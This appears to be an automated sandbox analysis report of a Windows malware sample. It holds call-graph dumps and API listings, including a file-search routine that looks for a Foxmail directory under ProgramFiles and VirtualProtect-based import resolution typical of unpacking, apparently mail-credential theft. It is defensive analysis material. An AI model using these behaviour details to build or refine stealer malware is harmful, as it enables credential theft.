351e7011 7393->7405 7395 351e693f 7396 351e7011 26 API calls 7395->7396 7397 351e695b 7396->7397 7398 351e7011 26 API calls 7397->7398 7399 351e6979 7398->7399 7400 351e571e 20 API calls 7399->7400 7401 351e68a9 7399->7401 7400->7401 7402 351e68bd 7401->7402 7419 351e56b9 RtlLeaveCriticalSection 7402->7419 7404 351e68c7 7404->7391 7406 351e7022 7405->7406 7410 351e701e 7405->7410 7407 351e7029 7406->7407 7411 351e703c 7406->7411 7408 351e6368 20 API calls 7407->7408 7409 351e702e 7408->7409 7412 351e62ac 26 API calls 7409->7412 7410->7395 7411->7410 7413 351e706a 7411->7413 7414 351e7073 7411->7414 7412->7410 7415 351e6368 20 API calls 7413->7415 7414->7410 7417 351e6368 20 API calls 7414->7417 7416 351e706f 7415->7416 7418 351e62ac 26 API calls 7416->7418 7417->7416 7418->7410 7419->7404 7635 351ea1c6 IsProcessorFeaturePresent 7636 351e7bc7 7637 351e7bd3 7636->7637 7639 351e7c0a 7637->7639 7644 351e5671 RtlEnterCriticalSection 7637->7644 7640 351e7be7 7645 351e7f86 7640->7645 7644->7640 7646 351e7bf7 7645->7646 7647 351e7f94 7645->7647 7649 351e7c10 7646->7649 7647->7646 7652 351e7cc2 7647->7652 7766 351e56b9 RtlLeaveCriticalSection 7649->7766 7651 351e7c17 7651->7639 7653 351e7cd8 7652->7653 7655 351e7d42 7652->7655 7653->7655 7657 351e7d0b 7653->7657 7662 351e571e 20 API calls 7653->7662 7656 351e571e 20 API calls 7655->7656 7679 351e7d90 7655->7679 7658 351e7d64 7656->7658 7659 351e7d2d 7657->7659 7667 351e571e 20 API calls 7657->7667 7660 351e571e 20 API calls 7658->7660 7661 351e571e 20 API calls 7659->7661 7663 351e7d77 7660->7663 7664 351e7d37 7661->7664 7666 351e7d00 7662->7666 7668 351e571e 20 API calls 7663->7668 7669 351e571e 20 API calls 7664->7669 7665 351e7dfe 7670 351e571e 20 API calls 7665->7670 7680 351e90ba 7666->7680 7673 351e7d22 7667->7673 7674 351e7d85 7668->7674 7669->7655 7675 351e7e04 7670->7675 7672 351e571e 20 API calls 7676 351e7d9e 7672->7676 7708 351e91b8 7673->7708 7678 351e571e 20 API calls 7674->7678 7675->7646 7676->7665 7676->7672 7678->7679 7720 351e7e35 7679->7720 7681 351e90cb 7680->7681 7707 351e91b4 7680->7707 7682 351e90dc 7681->7682 7683 351e571e 20 API calls 7681->7683 7684 351e90ee 7682->7684 7685 351e571e 20 API calls 7682->7685 7683->7682 7686 351e9100 7684->7686 7687 351e571e 20 API calls 7684->7687 7685->7684 7688 351e9112 7686->7688 7689 351e571e 20 API calls 7686->7689 7687->7686 7690 351e9124 7688->7690 7691 351e571e 20 API calls 7688->7691 7689->7688 7692 351e9136 7690->7692 7693 351e571e 20 API calls 7690->7693 7691->7690 7694 351e9148 7692->7694 7695 351e571e 20 API calls 7692->7695 7693->7692 7696 351e915a 7694->7696 7697 351e571e 20 API calls 7694->7697 7695->7694 7698 351e916c 7696->7698 7699 351e571e 20 API calls 7696->7699 7697->7696 7700 351e917e 7698->7700 7701 351e571e 20 API calls 7698->7701 7699->7698 7702 351e571e 20 API calls 7700->7702 7703 351e9190 7700->7703 7701->7700 7702->7703 7704 351e91a2 7703->7704 7705 351e571e 20 API calls 7703->7705 7706 351e571e 20 API calls 7704->7706 7704->7707 7705->7704 7706->7707 7707->7657 7709 351e91c5 7708->7709 7719 351e921d 7708->7719 7710 351e571e 20 API calls 7709->7710 7711 351e91d5 7709->7711 7710->7711 7712 351e571e 20 API calls 7711->7712 7714 351e91e7 7711->7714 7712->7714 7713 351e91f9 7715 351e920b 7713->7715 7717 351e571e 20 API calls 7713->7717 7714->7713 7716 351e571e 20 API calls 7714->7716 7718 351e571e 20 API calls 7715->7718 7715->7719 7716->7713 7717->7715 7718->7719 7719->7659 7721 351e7e60 7720->7721 7722 351e7e42 7720->7722 7721->7676 7722->7721 7726 351e925d 7722->7726 7725 351e571e 20 API calls 7725->7721 7727 351e7e5a 7726->7727 7728 351e926e 7726->7728 7727->7725 7762 351e9221 7728->7762 7731 351e9221 20 API calls 7732 351e9281 7731->7732 7733 351e9221 20 API calls 7732->7733 7734 351e928c 7733->7734 7735 351e9221 20 API calls 7734->7735 7736 351e9297 7735->7736 7737 351e9221 20 API calls 7736->7737 7738 351e92a5 7737->7738 7739 351e571e 20 API calls 7738->7739 7740 351e92b0 7739->7740 7741 351e571e 20 API calls 7740->7741 7742 351e92bb 7741->7742 7743 351e571e 20 API calls 7742->7743 7744 351e92c6 7743->7744 7745 351e9221 20 API calls 7744->7745 7746 351e92d4 7745->7746 7747 351e9221 20 API calls 7746->7747 7748 351e92e2 7747->7748 7749 351e9221 20 API calls 7748->7749 7750 351e92f3 7749->7750 7751 351e9221 20 API calls 7750->7751 7752 351e9301 7751->7752 7753 351e9221 20 API calls 7752->7753 7754 351e930f 7753->7754 7755 351e571e 20 API calls 7754->7755 7756 351e931a 7755->7756 7757 351e571e 20 API calls 7756->7757 7758 351e9325 7757->7758 7759 351e571e 20 API calls 7758->7759 7760 351e9330 7759->7760 7761 351e571e 20 API calls 7760->7761 7761->7727 7763 351e9258 7762->7763 7765 351e9248 7762->7765 7763->7731 7764 351e571e 20 API calls 7764->7765 7765->7763 7765->7764 7766->7651 7047 351ea945 7049 351ea96d 7047->7049 7048 351ea9a5 7049->7048 7050 351ea99e 7049->7050 7051 351ea997 7049->7051 7060 351eaa00 7050->7060 7056 351eaa17 7051->7056 7057 351eaa20 7056->7057 7064 351eb19b 7057->7064 7061 351eaa20 7060->7061 7062 351eb19b 21 API calls 7061->7062 7063 351ea9a3 7062->7063 7065 351eb1da 7064->7065 7070 351eb25c 7065->7070 7074 351eb59e 7065->7074 7067 351eb286 7069 351eb292 7067->7069 7081 351eb8b2 7067->7081 7072 351e2ada 5 API calls 7069->7072 7070->7067 7077 351e78a3 7070->7077 7073 351ea99c 7072->7073 7088 351eb5c1 7074->7088 7078 351e78cb 7077->7078 7079 351e2ada 5 API calls 7078->7079 7080 351e78e8 7079->7080 7080->7067 7082 351eb8bf 7081->7082 7083 351eb8d4 7081->7083 7085 351e6368 20 API calls 7082->7085 7086 351eb8d9 7082->7086 7084 351e6368 20 API calls 7083->7084 7084->7086 7087 351eb8cc 7085->7087 7086->7069 7087->7069 7089 351eb5ec 7088->7089 7090 351eb7e5 RaiseException 7089->7090 7091 351eb5bc 7090->7091 7091->7070 6540 351e7103 GetCommandLineA GetCommandLineW 6541 351e5303 6544 351e50a5 6541->6544 6553 351e502f 6544->6553 6547 351e502f 5 API calls 6548 351e50c3 6547->6548 6557 351e5000 6548->6557 6551 351e5000 20 API calls 6552 351e50d9 6551->6552 6554 351e5048 6553->6554 6555 351e2ada 5 API calls 6554->6555 6556 351e5069 6555->6556 6556->6547 6558 351e502a 6557->6558 6559 351e500d 6557->6559 6558->6551 6560 351e5024 6559->6560 6562 351e571e 20 API calls 6559->6562 6561 351e571e 20 API calls 6560->6561 6561->6558 6562->6559 7092 351eaf43 7093 351eaf4d 7092->7093 7094 351eaf59 7092->7094 7093->7094 7095 351eaf52 CloseHandle 7093->7095 7095->7094 7096 351e8640 7099 351e8657 7096->7099 7100 351e8679 7099->7100 7101 351e8665 7099->7101 7103 351e8693 7100->7103 7104 351e8681 7100->7104 7102 351e6368 20 API calls 7101->7102 7105 351e866a 7102->7105 7111 351e8652 7103->7111 7112 351e54a7 7103->7112 7106 351e6368 20 API calls 7104->7106 7108 351e62ac 26 API calls 7105->7108 7109 351e8686 7106->7109 7108->7111 7110 351e62ac 26 API calls 7109->7110 7110->7111 7113 351e54ba 7112->7113 7114 351e54c4 7112->7114 7113->7111 7114->7113 7115 351e5af6 38 API calls 7114->7115 7116 351e54e5 7115->7116 7117 351e7a00 38 API calls 7116->7117 7118 351e54fe 7117->7118 7120 351e7a2d 7118->7120 7121 351e7a40 7120->7121 7123 351e7a55 7120->7123 7121->7123 7124 351e6d7e 7121->7124 7123->7113 7125 351e6d8a 7124->7125 7126 351e5af6 38 API calls 7125->7126 7131 351e6d94 7126->7131 7128 351e6e18 7128->7123 7129 351e55a8 38 API calls 7129->7131 7131->7128 7131->7129 7132 351e571e 20 API calls 7131->7132 7133 351e5671 RtlEnterCriticalSection 7131->7133 7134 351e6e0f 7131->7134 7132->7131 7133->7131 7137 351e56b9 RtlLeaveCriticalSection 7134->7137 7136 351e6e16 7136->7131 7137->7136 7420 351e7a80 7421 351e7a8d 7420->7421 7422 351e637b 20 API calls 7421->7422 7423 351e7aa7 7422->7423 7424 351e571e 20 API calls 7423->7424 7425 351e7ab3 7424->7425 7426 351e637b 20 API calls 7425->7426 7429 351e7ad9 7425->7429 7427 351e7acd 7426->7427 7430 351e571e 20 API calls 7427->7430 7428 351e5eb7 11 API calls 7428->7429 7429->7428 7431 351e7ae5 7429->7431 7430->7429 7432 351e67bf 7437 351e67f4 7432->7437 7435 351e67db 7436 351e571e 20 API calls 7436->7435 7438 351e6806 7437->7438 7445 351e67cd 7437->7445 7439 351e680b 7438->7439 7440 351e6836 7438->7440 7441 351e637b 20 API calls 7439->7441 7440->7445 7448 351e71d6 7440->7448 7443 351e6814 7441->7443 7444 351e571e 20 API calls 7443->7444 7444->7445 7445->7435 7445->7436 7446 351e6851 7447 351e571e 20 API calls 7446->7447 7447->7445 7449 351e71e1 7448->7449 7450 351e7209 7449->7450 7451 351e71fa 7449->7451 7455 351e7218 7450->7455 7457 351e8a98 7450->7457 7452 351e6368 20 API calls 7451->7452 7456 351e71ff 7452->7456 7464 351e8acb 7455->7464 7456->7446 7458 351e8ab8 RtlSizeHeap 7457->7458 7459 351e8aa3 7457->7459 7458->7455 7460 351e6368 20 API calls 7459->7460 7461 351e8aa8 7460->7461 7462 351e62ac 26 API calls 7461->7462 7463 351e8ab3 7462->7463 7463->7455 7465 351e8ad8 7464->7465 7466 351e8ae3 7464->7466 7467 351e56d0 21 API calls 7465->7467 7468 351e8aeb 7466->7468 7474 351e8af4 7466->7474 7473 351e8ae0 7467->7473 7471 351e571e 20 API calls 7468->7471 7469 351e8b1e RtlReAllocateHeap 7469->7473 7469->7474 7470 351e8af9 7472 351e6368 20 API calls 7470->7472 7471->7473 7472->7473 7473->7456 7474->7469 7474->7470 7475 351e474f 7 API calls 7474->7475 7475->7474 7767 351e5bff 7775 351e5d5c 7767->7775 7770 351e5c13 7771 351e5b7a 20 API calls 7772 351e5c1b 7771->7772 7773 351e5c28 7772->7773 7774 351e5c2b 11 API calls 7772->7774 7774->7770 7776 351e5c45 5 API calls 7775->7776 7777 351e5d83 7776->7777 7778 351e5d9b TlsAlloc 7777->7778 7779 351e5d8c 7777->7779 7778->7779 7780 351e2ada 5 API calls 7779->7780 7781 351e5c09 7780->7781 7781->7770 7781->7771 6563 351e543d 6564 351e5440 6563->6564 6567 351e55a8 6564->6567 6578 351e7613 6567->6578 6570 351e55b8 6572 351e55c2 IsProcessorFeaturePresent 6570->6572 6573 351e55e0 6570->6573 6574 351e55cd 6572->6574 6608 351e4bc1 6573->6608 6576 351e60e2 8 API calls 6574->6576 6576->6573 6611 351e7581 6578->6611 6581 351e766e 6582 351e767a 6581->6582 6583 351e5b7a 20 API calls 6582->6583 6585 351e76a1 6582->6585 6587 351e76a7 6582->6587 6583->6585 6584 351e76f3 6586 351e6368 20 API calls 6584->6586 6585->6584 6585->6587 6607 351e76d6 6585->6607 6588 351e76f8 6586->6588 6593 351e771f 6587->6593 6625 351e5671 RtlEnterCriticalSection 6587->6625 6590 351e62ac 26 API calls 6588->6590 6589 351ebdc9 5 API calls 6592 351e7875 6589->6592 6590->6607 6592->6570 6594 351e777e 6593->6594 6597 351e7776 6593->6597 6604 351e77a9 6593->6604 6626 351e56b9 RtlLeaveCriticalSection 6593->6626 6594->6604 6627 351e7665 6594->6627 6599 351e4bc1 28 API calls 6597->6599 6599->6594 6603 351e7665 38 API calls 6603->6604 6630 351e782e 6604->6630 6605 351e780c 6606 351e5af6 38 API calls 6605->6606 6605->6607 6606->6607 6607->6589 6609 351e499b 28 API calls 6608->6609 6610 351e4bd2 6609->6610 6614 351e7527 6611->6614 6613 351e55ad 6613->6570 6613->6581 6615 351e7533 6614->6615 6620 351e5671 RtlEnterCriticalSection 6615->6620 6617 351e7541 6621 351e7575 6617->6621 6619 351e7568 6619->6613 6620->6617 6624 351e56b9 RtlLeaveCriticalSection 6621->6624 6623 351e757f 6623->6619 6624->6623 6625->6593 6626->6597 6628 351e5af6 38 API calls 6627->6628 6629 351e766a 6628->6629 6629->6603 6631 351e7834 6630->6631 6633 351e77fd 6630->6633 6654 351e56b9 RtlLeaveCriticalSection 6631->6654 6633->6605 6633->6607 6634 351e5af6 GetLastError 6633->6634 6635 351e5b0c 6634->6635 6636 351e5b12 6634->6636 6637 351e5e08 11 API calls 6635->6637 6638 351e637b 20 API calls 6636->6638 6640 351e5b61 SetLastError 6636->6640 6637->6636 6639 351e5b24 6638->6639 6641 351e5b2c 6639->6641 6642 351e5e5e 11 API calls 6639->6642 6640->6605 6643 351e571e 20 API calls 6641->6643 6644 351e5b41 6642->6644 6645 351e5b32 6643->6645 6644->6641 6646 351e5b48 6644->6646 6648 351e5b6d SetLastError 6645->6648 6647 351e593c 20 API calls 6646->6647 6649 351e5b53 6647->6649 6650 351e55a8 35 API calls 6648->6650 6651 351e571e 20 API calls 6649->6651 6652 351e5b79 6650->6652 6653 351e5b5a 6651->6653 6653->6640 6653->6648 6654->6633 7476 351e3eb3 7477 351e5411 38 API calls 7476->7477 7478 351e3ebb 7477->7478 6655 351e5630 6656 351e563b 6655->6656 6658 351e5664 6656->6658 6659 351e5660 6656->6659 6661 351e5eb7 6656->6661 6668 351e5688 6658->6668 6662 351e5c45 5 API calls 6661->6662 6663 351e5ede 6662->6663 6664 351e5efc InitializeCriticalSectionAndSpinCount 6663->6664 6665 351e5ee7 6663->6665 6664->6665 6666 351e2ada 5 API calls 6665->6666 6667 351e5f13 6666->6667 6667->6656 6669 351e56b4 6668->6669 6670 351e5695 6668->6670 6669->6659 6671 351e569f RtlDeleteCriticalSection 6670->6671 6671->6669 6671->6671 7138 351e3370 7149 351e3330 7138->7149 7150 351e334f 7149->7150 7151 351e3342 7149->7151 7152 351e2ada 5 API calls 7151->7152 7152->7150 7782 351e63f0 7783 351e6400 7782->7783 7792 351e6416 7782->7792 7784 351e6368 20 API calls 7783->7784 7785 351e6405 7784->7785 7786 351e62ac 26 API calls 7785->7786 7788 351e640f 7786->7788 7787 351e4e76 20 API calls 7793 351e64e5 7787->7793 7789 351e6480 7789->7787 7789->7789 7791 351e64ee 7794 351e571e 20 API calls 7791->7794 7792->7789 7795 351e6561 7792->7795 7801 351e6580 7792->7801 7793->7791 7798 351e6573 7793->7798 7812 351e85eb 7793->7812 7794->7795 7821 351e679a 7795->7821 7799 351e62bc 11 API calls 7798->7799 7800 351e657f 7799->7800 7802 351e658c 7801->7802 7802->7802 7803 351e637b 20 API calls 7802->7803 7804 351e65ba 7803->7804 7805 351e85eb 26 API calls 7804->7805 7806 351e65e6 7805->7806 7807 351e62bc 11 API calls 7806->7807 7808 351e6615 7807->7808 7809 351e66b6 FindFirstFileExA 7808->7809 7810 351e6705 7809->7810 7811 351e6580 26 API calls 7810->7811 7813 351e853a 7812->7813 7815 351e8554 7813->7815 7817 351e854f 7813->7817 7819 351e858b 7813->7819 7814 351e6368 20 API calls 7816 351e857a 7814->7816 7815->7793 7818 351e62ac 26 API calls 7816->7818 7817->7814 7817->7815 7818->7815 7819->7815 7820 351e6368 20 API calls 7819->7820 7820->7816 7822 351e67a4 7821->7822 7823 351e67b4 7822->7823 7824 351e571e 20 API calls 7822->7824 7825 351e571e 20 API calls 7823->7825 7824->7822 7826 351e67bb 7825->7826 7826->7788 7153 351e9e71 7154 351e9e95 7153->7154 7155 351e9ee6 7154->7155 7157 351e9f71 7154->7157 7158 351e9ef8 7155->7158 7161 351eaa53 7155->7161 7160 351eacad 7157->7160 7171 351eb2f0 7157->7171 7162 351eaa70 RtlDecodePointer 7161->7162 7164 351eaa80 7161->7164 7162->7164 7163 351e2ada 5 API calls 7166 351eac67 7163->7166 7165 351eab0d 7164->7165 7167 351eab02 7164->7167 7169 351eaab7 7164->7169 7165->7167 7168 351e6368 20 API calls 7165->7168 7166->7158 7167->7163 7168->7167 7169->7167 7170 351e6368 20 API calls 7169->7170 7170->7167 7172 351eb329 7171->7172 7173 351eb5c1 RaiseException 7172->7173 7174 351eb350 7172->7174 7173->7174 7175 351eb393 7174->7175 7177 351eb36e 7174->7177 7176 351eb8b2 20 API calls 7175->7176 7179 351eb38e 7176->7179 7182 351eb8e1 7177->7182 7180 351e2ada 5 API calls 7179->7180 7181 351eb3b7 7180->7181 7181->7160 7183 351eb8f0 7182->7183 7184 351eb90f 7183->7184 7185 351eb964 7183->7185 7187 351e78a3 5 API calls 7184->7187 7186 351eb8b2 20 API calls 7185->7186 7188 351eb95d 7186->7188 7189 351eb950 7187->7189 7188->7179 7189->7188 7190 351eb8b2 20 API calls 7189->7190 7190->7188 7191 351e506f 7192 351e5087 7191->7192 7193 351e5081 7191->7193 7194 351e5000 20 API calls 7193->7194 7194->7192 7483 351e60ac 7484 351e60b7 7483->7484 7486 351e60dd 7483->7486 7485 351e60c7 FreeLibrary 7484->7485 7484->7486 7485->7484 6672 351e742b 6673 351e7430 6672->6673 6675 351e7453 6673->6675 6676 351e8bae 6673->6676 6677 351e8bbb 6676->6677 6678 351e8bdd 6676->6678 6679 351e8bc9 RtlDeleteCriticalSection 6677->6679 6680 351e8bd7 6677->6680 6678->6673 6679->6679 6679->6680 6681 351e571e 20 API calls 6680->6681 6681->6678 7195 351eac6b 7196 351eac84 7195->7196 7197 351eacad 7196->7197 7198 351eb2f0 21 API calls 7196->7198 7198->7197 6029 351ec7a7 6030 351ec7be 6029->6030 6034 351ec82c 6029->6034 6030->6034 6041 351ec7e6 GetModuleHandleA 6030->6041 6031 351ec835 GetModuleHandleA 6035 351ec83f 6031->6035 6032 351ec872 6034->6031 6034->6032 6034->6035 6035->6034 6036 351ec85f GetProcAddress 6035->6036 6036->6034 6037 351ec7dd 6037->6034 6037->6035 6038 351ec800 GetProcAddress 6037->6038 6038->6034 6039 351ec80d VirtualProtect 6038->6039 6039->6034 6040 351ec81c VirtualProtect 6039->6040 6040->6034 6042 351ec7ef 6041->6042 6043 351ec82c 6041->6043 6053 351ec803 GetProcAddress 6042->6053 6045 351ec835 GetModuleHandleA 6043->6045 6046 351ec872 6043->6046 6048 351ec83f 6043->6048 6045->6048 6047 351ec7f4 6047->6043 6049 351ec800 GetProcAddress 6047->6049 6048->6043 6048->6048 6052 351ec85f GetProcAddress 6048->6052 6049->6043 6050 351ec80d VirtualProtect 6049->6050 6050->6043 6051 351ec81c VirtualProtect 6050->6051 6051->6043 6052->6043 6054 351ec82c 6053->6054 6055 351ec80d VirtualProtect 6053->6055 6057 351ec835 GetModuleHandleA 6054->6057 6058 351ec872 6054->6058 6055->6054 6056 351ec81c VirtualProtect 6055->6056 6056->6054 6059 351ec83f 6057->6059 6059->6054 6059->6059 6060 351ec85f GetProcAddress 6059->6060 6060->6059 7199 351e7260 GetStartupInfoW 7200 351e7318 7199->7200 7201 351e7286 7199->7201 7201->7200 7205 351e8be3 7201->7205 7203 351e72af 7203->7200 7204 351e72dd GetFileType 7203->7204 7204->7203 7206 351e8bef 7205->7206 7207 351e8bfc 7206->7207 7208 351e8c13 7206->7208 7209 351e6368 20 API calls 7207->7209 7218 351e5671 RtlEnterCriticalSection 7208->7218 7211 351e8c01 7209->7211 7212 351e62ac 26 API calls 7211->7212 7214 351e8c0b 7212->7214 7213 351e8c4b 7226 351e8c72 7213->7226 7214->7203 7215 351e8c1f 7215->7213 7219 351e8b34 7215->7219 7218->7215 7220 351e637b 20 API calls 7219->7220 7225 351e8b46 7220->7225 7221 351e8b53 7222 351e571e 20 API calls 7221->7222 7223 351e8ba5 7222->7223 7223->7215 7224 351e5eb7 11 API calls 7224->7225 7225->7221 7225->7224 7229 351e56b9 RtlLeaveCriticalSection 7226->7229 7228 351e8c79 7228->7214 7229->7228 7487 351e81a0 7488 351e81d9 7487->7488 7489 351e81dd 7488->7489 7500 351e8205 7488->7500 7490 351e6368 20 API calls 7489->7490 7491 351e81e2 7490->7491 7493 351e62ac 26 API calls 7491->7493 7492 351e8529 7494 351e2ada 5 API calls 7492->7494 7495 351e81ed 7493->7495 7496 351e8536 7494->7496 7497 351e2ada 5 API calls 7495->7497 7498 351e81f9 7497->7498 7500->7492 7501 351e80c0 7500->7501 7504 351e80db 7501->7504 7502 351e2ada 5 API calls 7503 351e8152 7502->7503 7503->7500 7504->7502 7827 351ea1e0 7830 351ea1fe 7827->7830 7829 351ea1f6 7832 351ea203 7830->7832 7831 351eaa53 21 API calls 7833 351ea42f 7831->7833 7832->7831 7834 351ea298 7832->7834 7833->7829 7834->7829 7230 351e9d61 7231 351e9d81 7230->7231 7234 351e9db8 7231->7234 7233 351e9dab 7235 351e9dbf 7234->7235 7236 351e9e20 7235->7236 7237 351e9ddf 7235->7237 7238 351eaa17 21 API calls 7236->7238 7240 351ea90e 7236->7240 7237->7240 7241 351eaa17 21 API calls 7237->7241 7239 351e9e6e 7238->7239 7239->7233 7240->7233 7242 351ea93e 7241->7242 7242->7233 7505 351e21a1 7508 351e2418 7505->7508 7509 351e2420 7508->7509 7512 351e47f5 7509->7512 7511 351e21bc 7513 351e4808 7512->7513 7514 351e4804 7512->7514 7517 351e4815 7513->7517 7514->7511 7518 351e5b7a 20 API calls 7517->7518 7521 351e482c 7518->7521 7519 351e2ada 5 API calls 7520 351e4811 7519->7520 7520->7511 7521->7519

                              Control-flow Graph

                              APIs
                              • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 351E1137
                              • lstrcatW.KERNEL32(?,?), ref: 351E1151
                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 351E115C
                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 351E116D
                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 351E117C
                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 351E1193
                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 351E11D0
                              • FindClose.KERNEL32(00000000), ref: 351E11DB
                              Memory Dump Source
                              • Source File: 00000007.00000002.183103032294.00000000351E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 351E0000, based on PE: true
                              • Associated: 00000007.00000002.183102995632.00000000351E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000007.00000002.183103032294.00000000351F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_351e0000_Vexploio.jbxd
                              Similarity
                              • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                              • String ID:
                              • API String ID: 1083526818-0
                              • Opcode ID: 76e220b62d5e6d91f595b8eb1d215932f8ad05482bf6c2183e2360e8d805db84
                              • Instruction ID: 8b19331c094caf03e85a2f7480936a9561a3b15a69aed29719aae397b693d423
                              • Opcode Fuzzy Hash: 76e220b62d5e6d91f595b8eb1d215932f8ad05482bf6c2183e2360e8d805db84
                              • Instruction Fuzzy Hash: DF218F726447486BD721EBA49C48F9BBBACEF84314F040D2AB958E31D0EB70D6158796

                              Control-flow Graph

                              APIs
                              • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 351E1434
                                • Part of subcall function 351E10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 351E1137
                                • Part of subcall function 351E10F1: lstrcatW.KERNEL32(?,?), ref: 351E1151
                                • Part of subcall function 351E10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 351E115C
                                • Part of subcall function 351E10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 351E116D
                                • Part of subcall function 351E10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 351E117C
                                • Part of subcall function 351E10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 351E1193
                                • Part of subcall function 351E10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 351E11D0
                                • Part of subcall function 351E10F1: FindClose.KERNEL32(00000000), ref: 351E11DB
                              • lstrlenW.KERNEL32(?), ref: 351E14C5
                              • lstrlenW.KERNEL32(?), ref: 351E14E0
                              • lstrlenW.KERNEL32(?,?), ref: 351E150F
                              • lstrcatW.KERNEL32(00000000), ref: 351E1521
                              • lstrlenW.KERNEL32(?,?), ref: 351E1547
                              • lstrcatW.KERNEL32(00000000), ref: 351E1553
                              • lstrlenW.KERNEL32(?,?), ref: 351E1579
                              • lstrcatW.KERNEL32(00000000), ref: 351E1585
                              • lstrlenW.KERNEL32(?,?), ref: 351E15AB
                              • lstrcatW.KERNEL32(00000000), ref: 351E15B7
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.183103032294.00000000351E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 351E0000, based on PE: true
                              • Associated: 00000007.00000002.183102995632.00000000351E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000007.00000002.183103032294.00000000351F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_351e0000_Vexploio.jbxd
                              Similarity
                              • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                              • String ID: )$Foxmail$ProgramFiles
                              • API String ID: 672098462-2938083778
                              • Opcode ID: b24508e337c056c66c1b5f124686a00a617eb0af886c76aa128db1c592118eb6
                              • Instruction ID: 2292a78eb84729ee820094c6805db81b48dcf9b89a432ba0fc891d02692a23ad
                              • Opcode Fuzzy Hash: b24508e337c056c66c1b5f124686a00a617eb0af886c76aa128db1c592118eb6
                              • Instruction Fuzzy Hash: 2C81D371A40398A9DB20DBA0DC85FDFB37DEF84700F00059AF609E7191EAB25A85CF95

                              Control-flow Graph

                              APIs
                              • GetModuleHandleA.KERNEL32(351EC7DD), ref: 351EC7E6
                              • GetModuleHandleA.KERNEL32(?,351EC7DD), ref: 351EC838
                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 351EC860
                                • Part of subcall function 351EC803: GetProcAddress.KERNEL32(00000000,351EC7F4), ref: 351EC804
                                • Part of subcall function 351EC803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,351EC7F4,351EC7DD), ref: 351EC816
                                • Part of subcall function 351EC803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,351EC7F4,351EC7DD), ref: 351EC82A
                              Memory Dump Source
                              • Source File: 00000007.00000002.183103032294.00000000351E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 351E0000, based on PE: true
                              • Associated: 00000007.00000002.183102995632.00000000351E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000007.00000002.183103032294.00000000351F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_351e0000_Vexploio.jbxd
                              Similarity
                              • API ID: AddressHandleModuleProcProtectVirtual
                              • String ID:
                              • API String ID: 2099061454-0
                              • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                              • Instruction ID: 26022a158cda497674b943b9d6c5a52c908ce2372c27398bf3b0e13aa714ac36
                              • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                              • Instruction Fuzzy Hash: 9B016850A49F403CBB1092740E01EFA6FEABB23AACB140756E041C7193CBA08502C3F6

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 79 351ec7a7-351ec7bc 80 351ec7be-351ec7c6 79->80 81 351ec82d 79->81 80->81 83 351ec7c8-351ec7f6 call 351ec7e6 80->83 82 351ec82f-351ec833 81->82 84 351ec835-351ec83d GetModuleHandleA 82->84 85 351ec872 call 351ec877 82->85 91 351ec86c-351ec86e 83->91 92 351ec7f8 83->92 87 351ec83f-351ec847 84->87 87->87 90 351ec849-351ec84c 87->90 90->82 93 351ec84e-351ec850 90->93 94 351ec866-351ec86b 91->94 95 351ec870 91->95 96 351ec7fa-351ec7fe 92->96 97 351ec85b-351ec85e 92->97 98 351ec856-351ec85a 93->98 99 351ec852-351ec854 93->99 94->91 95->90 102 351ec865 96->102 103 351ec800-351ec80b GetProcAddress 96->103 100 351ec85f-351ec860 GetProcAddress 97->100 98->97 99->100 100->102 102->94 103->81 104 351ec80d-351ec81a VirtualProtect 103->104 105 351ec82c 104->105 106 351ec81c-351ec82a VirtualProtect 104->106 105->81 106->105
                              APIs
                              • GetModuleHandleA.KERNEL32(?,351EC7DD), ref: 351EC838
                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 351EC860
                                • Part of subcall function 351EC7E6: GetModuleHandleA.KERNEL32(351EC7DD), ref: 351EC7E6
                                • Part of subcall function 351EC7E6: GetProcAddress.KERNEL32(00000000,351EC7F4), ref: 351EC804
                                • Part of subcall function 351EC7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,351EC7F4,351EC7DD), ref: 351EC816
                                • Part of subcall function 351EC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,351EC7F4,351EC7DD), ref: 351EC82A
                              Memory Dump Source
                              • Source File: 00000007.00000002.183103032294.00000000351E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 351E0000, based on PE: true
